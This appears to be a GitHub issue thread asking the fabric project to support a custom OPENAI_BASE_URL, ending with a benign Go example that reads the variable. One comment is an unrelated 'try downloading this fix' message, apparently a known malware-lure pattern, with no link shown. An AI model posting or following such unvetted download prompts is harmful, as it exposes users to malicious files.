[Feature request]: Add support for setting a custom OPENAI_BASE_URL #883
Comments
To fix your trouble, try downloading this fix; I saw it in another issue.
That would be nice for llama.cpp's server or llamafiles. A lot of models and a big community. Thanks for the project.
A configurable OPENAI_BASE_URL is likely in strong demand for users in some regions.
This feature is already in place. It has been available for several releases. What do you need?
In the previous Python version of fabric, I was able to use the free Llama 3.1 API at https://chatapi.akash.network/ by setting the `OPENAI_BASE_URL` environment variable. This no longer seems to be possible in the Go version.
Please re-integrate this feature so we can use Llama 3.1 400b with fabric. :^)
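For reference, here is a minimal sketch of how an OpenAI-compatible Go client can honor an `OPENAI_BASE_URL` override. It assumes the `github.com/sashabaranov/go-openai` library, which is not necessarily what fabric uses internally, and the model name is a placeholder that depends on the provider behind the base URL.

```go
package main

import (
	"context"
	"fmt"
	"os"

	openai "github.com/sashabaranov/go-openai"
)

func main() {
	// Standard OpenAI credentials; the base URL override is optional.
	apiKey := os.Getenv("OPENAI_API_KEY")

	config := openai.DefaultConfig(apiKey)
	// If OPENAI_BASE_URL is set, point the client at that endpoint
	// (e.g. the URL of an OpenAI-compatible provider) instead of api.openai.com.
	if baseURL := os.Getenv("OPENAI_BASE_URL"); baseURL != "" {
		config.BaseURL = baseURL
	}

	client := openai.NewClientWithConfig(config)

	resp, err := client.CreateChatCompletion(context.Background(), openai.ChatCompletionRequest{
		// Placeholder model name; use whatever model ID the provider exposes.
		Model: "llama-3.1-405b",
		Messages: []openai.ChatCompletionMessage{
			{Role: openai.ChatMessageRoleUser, Content: "Hello"},
		},
	})
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		return
	}
	fmt.Println(resp.Choices[0].Message.Content)
}
```

With something like this in place, exporting `OPENAI_BASE_URL` (plus whatever path and model name the provider requires) is all that's needed to point requests at an alternative OpenAI-compatible endpoint.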